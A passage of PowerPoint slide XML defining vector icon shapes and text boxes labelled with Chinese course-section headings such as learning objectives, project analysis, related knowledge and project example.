                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="672" y="3092"/>
              <a:ext cx="14823" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14823" cy="4347"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 20"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="10984" y="3092"/>
                <a:ext cx="2054" cy="3685"/>
                <a:chOff x="9539460" y="2484779"/>
                <a:chExt cx="1304471" cy="2340121"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="20" name="Group 21"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9539460" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent5"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="24" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="21" name="Oval 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9904781" y="4239008"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="22" name="AutoShape 59"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10027260" y="4362838"/>
                  <a:ext cx="328869" cy="328308"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10794 23"/>
                    <a:gd name="T1" fmla="*/ T0 w 21543"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T3" fmla="+- 0 10794 23"/>
                    <a:gd name="T4" fmla="*/ T3 w 21543"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T6" fmla="+- 0 10794 23"/>
                    <a:gd name="T7" fmla="*/ T6 w 21543"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T9" fmla="+- 0 10794 23"/>
                    <a:gd name="T10" fmla="*/ T9 w 21543"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T7" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21543" h="21600">
                      <a:moveTo>
                        <a:pt x="16976" y="19986"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11226" y="17680"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="11088" y="17626"/>
                        <a:pt x="10946" y="17608"/>
                        <a:pt x="10806" y="17600"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19660" y="3837"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="19660" y="3837"/>
                        <a:pt x="16976" y="19986"/>
                        <a:pt x="16976" y="19986"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="6859" y="16244"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6858" y="16242"/>
                        <a:pt x="6855" y="16240"/>
                        <a:pt x="6854" y="16238"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19606" y="2552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8735" y="19536"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8735" y="19536"/>
                        <a:pt x="6859" y="16244"/>
                        <a:pt x="6859" y="16244"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2111" y="14024"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17712" y="3595"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6369" y="15770"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6309" y="15734"/>
                        <a:pt x="6256" y="15687"/>
                        <a:pt x="6190" y="15660"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6190" y="15660"/>
                        <a:pt x="2111" y="14024"/>
                        <a:pt x="2111" y="14024"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="21234" y="108"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21123" y="35"/>
                        <a:pt x="20996" y="0"/>
                        <a:pt x="20868" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20738" y="0"/>
                        <a:pt x="20608" y="36"/>
                        <a:pt x="20495" y="113"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="299" y="13613"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="13751"/>
                        <a:pt x="-23" y="13995"/>
                        <a:pt x="3" y="14244"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="14494"/>
                        <a:pt x="190" y="14708"/>
                        <a:pt x="422" y="14801"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5689" y="16914"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8166" y="21259"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8284" y="21468"/>
                        <a:pt x="8505" y="21597"/>
                        <a:pt x="8743" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8751" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8987" y="21599"/>
                        <a:pt x="9206" y="21474"/>
                        <a:pt x="9328" y="21271"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10726" y="18934"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17253" y="21551"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="17332" y="21584"/>
                        <a:pt x="17418" y="21599"/>
                        <a:pt x="17502" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17617" y="21599"/>
                        <a:pt x="17731" y="21571"/>
                        <a:pt x="17832" y="21512"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18010" y="21412"/>
                        <a:pt x="18133" y="21238"/>
                        <a:pt x="18167" y="21035"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21533" y="785"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21576" y="520"/>
                        <a:pt x="21459" y="254"/>
                        <a:pt x="21234" y="108"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solid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sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="672" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" dirty="0"/>
                  <a:t>学习目标</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3020" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目分析</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5759" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>相关知识</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="73" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8551" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实例</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11344" y="6929"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
